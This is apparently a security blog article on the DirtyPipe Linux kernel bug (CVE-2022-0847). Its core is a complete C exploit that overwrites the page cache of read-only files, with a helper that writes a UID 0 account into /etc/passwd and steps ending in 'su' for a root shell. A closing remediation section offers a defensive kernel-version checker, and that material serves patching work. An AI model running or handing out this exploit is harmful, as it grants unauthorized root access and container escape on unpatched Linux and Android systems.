Exploiting DirtyPipe aka CVE-2022-0847 - Linux Privilege Escalation Vulnerability | 15 March 2022.


A couple of days ago, security researcher Max Kellermann published a new Linux kernel vulnerability named DirtyPipe, tracked as CVE-2022-0847. It is similar in effect to the DirtyCow vulnerability (CVE-2016-5195) published in 2016: both let an unprivileged process write into the page cache of a file it is only allowed to read. DirtyPipe is considerably easier to exploit, though, because it does not depend on winning a race condition.

DirtyPipe is a local privilege escalation vulnerability in the Linux kernel. It was introduced in version 5.8 and fixed in 5.16.11, 5.15.25 and 5.10.102. It allows an unprivileged local attacker to bypass file permissions and overwrite data in any file the attacker can open for reading, including root-owned, read-only files such as /etc/passwd and SUID binaries. Because those files decide who ends up with UID 0, the bug amounts to a reliable local privilege escalation to root.

Affected systems

Popular Linux distributions such as Ubuntu, Debian and Red Hat Enterprise Linux shipped affected kernels. Android devices running kernel 5.8 or newer are vulnerable as well. Since the page cache is shared between a container and its host, the bug can also be used to modify read-only host files that are visible inside a container (a read-only bind mount, for example), so it is possible to use it to break out of container isolation.

MITRE ATT&CK mapping

If you would like to map it to the MITRE ATT&CK matrix: tactic Privilege Escalation (TA0004), technique Exploitation for Privilege Escalation (T1068).

Exploitation

There are many ways to exploit DirtyPipe with the public PoC code. The only requirement on the target is that the attacker can open it for reading, and the write primitive has three limits: it cannot start at the first byte of a page, it cannot cross a page boundary, and it cannot grow the file. The overwrite also only changes the page cache, so nothing is modified on disk and the change disappears once the page is evicted or the machine reboots; that is still long enough to run a backdoored SUID binary or to log in with a planted account. Common targets are therefore /etc/passwd (world-readable) or a SUID binary such as /usr/bin/su. Writing a new SSH key for root only works where root's authorized_keys file happens to be readable, which it normally is not. The demo here is based on writing a new UID 0 user to /etc/passwd.
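The following is an added example written for this article; it is neither the original post's code nor Max Kellermann's PoC, although it implements the same public technique. It wraps the primitive in a reusable function, adds the pre-flight checks for the three limits described above, and builds the /etc/passwd line the demo writes. Assumptions, marked in the comments: 4 KiB pages, the passwd entry format (home /root, shell /bin/sh), and the user/hash being passed on the command line.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define PAGE_SZ 4096 /* assumption: 4 KiB pages (x86-64 and most arm64 builds) */

/* Pre-flight checks for the DirtyPipe write. The write may only replace bytes
 * that already exist, must stay inside one page, and must not begin at the
 * first byte of a page (splice() has to move at least one byte of that page
 * into the pipe first). Returns 0 for a legal (offset, len), negative otherwise. */
int check_target(off_t file_size, off_t offset, size_t len)
{
    if (len == 0 || offset < 0) return -1;
    if (offset % PAGE_SZ == 0) return -2;                     /* first byte of a page */
    if (offset + (off_t)len > file_size) return -3;           /* would grow the file */
    if (offset / PAGE_SZ != (offset + (off_t)len - 1) / PAGE_SZ) return -4; /* crosses a page */
    return 0;
}

/* Assumed entry format for the demo: a UID 0 account with a pre-computed
 * crypt(3) hash. Returns the entry length, or -1 if it did not fit. */
int build_passwd_entry(char *out, size_t cap, const char *user, const char *hash)
{
    int n = snprintf(out, cap, "%s:%s:0:0::/root:/bin/sh\n", user, hash);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* Fill the pipe completely, then drain it: every pipe_buffer is recycled with
 * PIPE_BUF_FLAG_CAN_MERGE still set, and that stale flag is the bug. */
static int prepare_pipe(int p[2])
{
    static char scratch[PAGE_SZ];
    if (pipe(p) < 0) return -1;
    int size = fcntl(p[1], F_GETPIPE_SZ);
    if (size < 0) return -1;
    for (int left = size; left > 0;) {
        int n = left > PAGE_SZ ? PAGE_SZ : left;
        if (write(p[1], scratch, n) != n) return -1;
        left -= n;
    }
    for (int left = size; left > 0;) {
        int n = left > PAGE_SZ ? PAGE_SZ : left;
        if (read(p[0], scratch, n) != n) return -1;
        left -= n;
    }
    return 0;
}

/* Overwrite len bytes of path at offset. Only read access is needed; the new
 * bytes land in the page cache and are never written back to disk. */
int dirty_pipe_write(const char *path, off_t offset, const void *data, size_t len)
{
    struct stat st;
    int p[2], rc = -1;
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    if (fstat(fd, &st) == 0 && check_target(st.st_size, offset, len) == 0 &&
        prepare_pipe(p) == 0) {
        /* splice() one byte of the target page into the pipe... */
        loff_t off = offset - 1;
        if (splice(fd, &off, p[1], NULL, 1, 0) == 1 &&
            /* ...then a plain write() merges the payload into that cached page. */
            write(p[1], data, len) == (ssize_t)len)
            rc = 0;
        close(p[0]);
        close(p[1]);
    }
    close(fd);
    return rc;
}

int main(int argc, char **argv)
{
    char entry[256];
    if (argc != 5) {
        fprintf(stderr, "usage: %s FILE OFFSET USER CRYPT_HASH\n", argv[0]);
        return 1;
    }
    int n = build_passwd_entry(entry, sizeof entry, argv[3], argv[4]);
    if (n < 0 || dirty_pipe_write(argv[1], atoll(argv[2]), entry, (size_t)n) != 0) {
        fprintf(stderr, "write failed: bad offset or unreadable file\n");
        return 1;
    }
    /* The pipe write succeeds on patched kernels too; only the file tells. */
    printf("pushed %d bytes at offset %s; check %s to confirm\n", n, argv[2], argv[1]);
    return 0;
}
```

Back up /etc/passwd before trying this (`cp /etc/passwd /tmp/passwd.bak`), pick an offset inside an existing line that is not 0, and generate the hash with `openssl passwd -1`. Because the write only touches the page cache, `cat /etc/passwd` shows the new entry while the on-disk file is untouched; `su USER` then gives a root shell. Note that the final write() into the pipe succeeds on a patched kernel as well, so success of the program does not by itself prove the kernel is vulnerable; compare the file contents afterwards.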

Remediation

Most major Linux distributions have released advisories and updated kernels for this issue. The fix landed upstream in 5.16.11, 5.15.25 and 5.10.102; distributions backport it into their own kernel version numbers, so check your vendor's advisory for CVE-2022-0847 rather than relying on the upstream number alone. There is no sysctl or configuration workaround: update the kernel and reboot.
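As an added example, not part of the original post, here is a small checker that applies the upstream version boundaries above to a release string such as the one `uname -r` returns. The "-rc" mainline builds and distribution kernels that carry a backported fix under an older-looking version (Ubuntu's 5.13.0-NN kernels, for instance) are deliberately not modelled; for those, the vendor advisory is the source of truth.

```c
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

struct kver { int major, minor, patch; };

/* Parse "5.15.24-generic" or "5.16.0" style release strings. Returns 0 on
 * success; a missing patch level (e.g. "5.8") is read as 0. */
int parse_kver(const char *s, struct kver *v)
{
    v->major = v->minor = v->patch = 0;
    return sscanf(s, "%d.%d.%d", &v->major, &v->minor, &v->patch) >= 2 ? 0 : -1;
}

static int at_least(struct kver v, int maj, int min, int pat)
{
    if (v.major != maj) return v.major > maj;
    if (v.minor != min) return v.minor > min;
    return v.patch >= pat;
}

/* 1 = vulnerable by upstream numbering, 0 = not affected or fixed upstream,
 * -1 = unparseable. Fixed in 5.16.11, 5.15.25, 5.10.102; 5.17 shipped fixed. */
int dirtypipe_vulnerable(const char *release)
{
    struct kver v;
    if (parse_kver(release, &v) != 0) return -1;
    if (!at_least(v, 5, 8, 0)) return 0;   /* bug introduced in 5.8 */
    if (at_least(v, 5, 17, 0)) return 0;   /* 5.17 and later include the fix */
    if (v.major == 5 && v.minor == 10) return v.patch < 102;
    if (v.major == 5 && v.minor == 15) return v.patch < 25;
    if (v.major == 5 && v.minor == 16) return v.patch < 11;
    return 1; /* 5.8, 5.9, 5.11-5.14: end-of-life upstream, never fixed there */
}

int main(void)
{
    struct utsname u;
    if (uname(&u) != 0) { perror("uname"); return 1; }
    int r = dirtypipe_vulnerable(u.release);
    printf("%s: %s\n", u.release,
           r == 1 ? "VULNERABLE (upstream numbering; check vendor advisory)"
                  : r == 0 ? "not affected or fixed upstream" : "could not parse");
    return 0;
}
```

Compile with `cc -o dirtypipe_check dirtypipe_check.c` and run it on each host; a "VULNERABLE" result on a distribution kernel should be confirmed against the vendor's CVE-2022-0847 advisory before raising an alarm.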